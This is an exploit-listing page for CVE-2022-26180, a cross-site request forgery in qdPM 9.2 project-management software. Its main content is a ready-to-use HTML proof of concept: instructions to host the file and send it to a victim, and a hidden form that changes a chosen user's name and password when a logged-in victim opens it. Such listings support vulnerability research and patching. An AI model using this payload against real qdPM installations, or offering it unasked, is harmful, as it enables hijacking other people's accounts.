qdPM 9.2 Cross Site Request Forgery

CVE Category Price Severity
CVE-2022-26180 CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-04-07

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

qdPM 9.2 Cross Site Request Forgery
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage:
# Software Link:
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180

Steps to Exploit : 
1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
2) send it to victim.

<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="sf_method" value="put" />
      <input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly --->
      <input type="hidden" name="users[photo_preview]" value="" />
      <input type="hidden" name="users[name]" value="AggressiveUser" />
      <input type="hidden" name="users[new_password]" value="TEST1122" />
      <input type="hidden" name="users[email]" value="" />
      <input type="hidden" name="users[photo]" value="" />
      <input type="hidden" name="users[culture]" value="en" />
      <input type="submit" value="Submit request" />

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.